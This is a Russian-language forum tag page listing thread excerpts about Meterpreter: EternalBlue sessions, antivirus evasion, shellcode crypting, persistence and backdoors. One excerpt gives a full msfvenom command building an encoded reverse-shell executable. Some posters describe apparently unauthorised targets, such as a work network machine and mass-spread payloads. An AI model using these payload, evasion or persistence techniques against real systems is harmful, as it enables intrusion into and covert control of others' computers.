meterpreter

  1. KirsanovS

    Решено Termux/Metasploit

    В общем, такой вопрос: на работе есть вафля, есть уязвимая машина для eternalblue, получаю сессию через termux, все окей. так вот, можно ли эту сессию перенести на мой домашний пк, с моей, соответственно вафлей?
  2. A

    Проблема Не поднимается сессия meterpreter

    В метасплойте multi/handler и payload настроены верно. Сессия прилетает, а это значит что сам payload не палится антивирусом целевой системы. Но сессия не поднимается ...и на этом все останавливается. Видимо детектится и блокируется канал пересылки самого стейджера антивирусом или сетевым...
  3. b0d

    Проблема Крипт шеллкода meterpreter

    Пытаюсь обойти дефендер. Сделал билд по этой статье, выставил флаги и пожал упхом https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher-it/ Дефендер сам ехе не палит, но после запуска и коннекта на хендлер метасплоита дефендер просыпается и убивает процесс. Орет что...
  4. SooLFaa

    Статья Обход антивируса с помощью Метасплоита

    Первоисточник: Bypassing Detection for a Reverse Meterpreter Shell – Checkmate Перевод: Перевод выполнен от команды Codeby Примечание от команды форума: Статья является переводом. Метерпретер - это очень мощный по функционалу и основной payload для Metasploit. В статье рассматривается способ...
  5. S

    Проблема Открытие и закрытие сесий Meterpreter

    Доброго времени суток, я новичек в плане метасплоита но все же пытаюсь взломать свой смартфон, и так почитал гайды по написанию эксплоита. Все сделал правильно запустил msfconsole далее последовали такие команды из мануал предоставленого на форуме use exploit/multi/handler set payload...
  6. P

    Решено Получить текст из другого линукс терминала.

    Всем привет. Заразил метерпретером пк, там точно запущен 1 терминал. Мне нужно прочитать текст из того терминала. Имеем: 2 бэкдора. Оба мои. 1 Просто реверс шелл, другой реверс метерпретер. 1 окно терминала. ID процесса нужного терминала. Система: debian У кого то есть идеи как это сделать...
  7. N

    Проблема Мониторинг вирусов, живущих в оперативной памяти

    Доброго времени суток! Подскажите пожалуйста, как обычному юзеру научиться выявлять трояны, которые находятся в оперативной памяти - ведь антивирусы для них зачастую не являются барьером. В интернете пишут что все же такие вирусы оставляют следы в реестре, дампах, а так же их можно вычислить по...
  8. G

    Проблема Автоматический персистенс/бэкдор для meterpreter-сессии

    Нужна помощь в организации автоматического персистенса/бэкдора Пока тестирую в локальной сети на Win7. Идея такая: пейлоад распространяется массово, атакующая машина Kali стоит на VDS и перманентно слушает порт через multi/handler. Как только прилетает meterpreter-сессия должен сработать...
  9. F

    Проблема activity start

    Всем привет, может ли кто нибудь помочь? В метерпретер для ведра есть команда activity_start Так вот хотелось бы знать как ею пользоваться, может есть какой нибудь список активити, или как получить его можно?
  10. lsdrfrx

    Проблема Шифрование бэкдоров

    Требуется спрятать бэкдор от антивирусов, чекал всевозможные статьи, ничего не выходит. Создаю через metasploit-framework, требуется спрятать windows/meterpreter/reverse_tcp. Кажется, что самому написать бэкдор, который не будет палиться антивирусом, проще, чем найти программу, которая спрячет...
  11. Rook

    Проблема Скачивание данных через Армитаж

    Всем привет,подключаюсь к ВМ ОС Вин7,через армитаж,eternalblue ms17 010 ,нагрузка meterpreter/reverse_tcp ,потом через меню пытаюсь открыть диск с данными,все открывает,показывает,при по пытке скачать,создаёт только папки с данными в папке загрузок,1 раз скачал файл размером 1кб desktop.ini и не...
  12. Rook

    Проблема Коннект метерпретер

    В сети есть удаленное устройство ( не в сети роутера,а в подсети города одного провайдера) через смб17_010 все уязвимо,но если подключатся из локальной сети роутера и выходить в мир,идёт fail и сбрасывается Коннект,а если включить кабель на прямую и ввести статику,то все удачно коннектится. В...
  13. gushmazuko

    Статья Meterpreter снова в деле: 100% FUD with Metasploit 5

    Введение Доброго времени суток друзья! Рад снова вас видеть! Написать эту статью я намеревался еще до официального релиза Metasploit 5, но вечно не хватающее время и некоторые другие обстоятельства не позволили этому сбыться. Сегодня речь пойдет как вы уже могли понять из заголовка - об обходе...
  14. g3r01n

    meterpreter and nat

    Всем привет, есть ли возможность провести аудит пк удаленно с помощью meterpreter? Пробовал через ngrok, не получилось, читал статью Vander'a и тоже нуль результатов. Может кто объяснить?
  15. K

    метерпретер конект

    Здравствуйте, в инете очень много способов создать фуд пейлоад (метасплоит) запустить его тоже не большая проблема, только вот допустим меня нету дома и метерпретер конектится, но не может подконектиться так как комп выключен, как я знаю сессия умрет через 15 минут да? Что мне сделать чтоб...
  16. recrut

    Debian 9 - install metasploit на vps ( для получения сессии при белом ip)

    Друзья, подскажите, думаю многим пригодится В инете что не сервер, то новая инструкция, + разные оболочки с настойками Посоветуйте, как не напороть косяков! Грамотно установить оболочку, не инсталируя лишнего, что б не вызвать конфликтов. И главное как им (сервером) управлять в графическом...
  17. E

    Проблема Meterpreter session 8 closed. Reason: Died

    Доброго время суток. Нуждаюсь в помощи людей который знакомы с metasploit.Проблема такая, я генерирую пейлоад ( msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=172.16.104.130 LPORT=443 -b "\x00" -e x64/shikata_ga_nai -f exe -o /tmp/1.exe ), закидаю файл на машину...
  18. R

    Проблема Eternalblue & Doublepulsar. Error getting output back from Core.

    В локалке имеется машинка Win7 SP1 x86 (192.168.1.106) И Kali linux (192.168.1.103) на которую установлен Metasploit-Framework с добавленным модулем exploit/windows/smb/eternalblue_doublepulsar. Сканирую виндовую машину с помощью auxiliary/scaner/smb/smb_ms17_010: Делаю вывод, что машинка...
  19. R

    Проблема EternalBlue. Did not receive a response from exploit packet.

    Помогите пожалуйста, почему возникает эта ошибка? Можно ли как-то от нее избавиться, и если можно, то как?
  20. kravl

    Как создать payload который будет работать в режиме persistence ?

    Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ? Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый...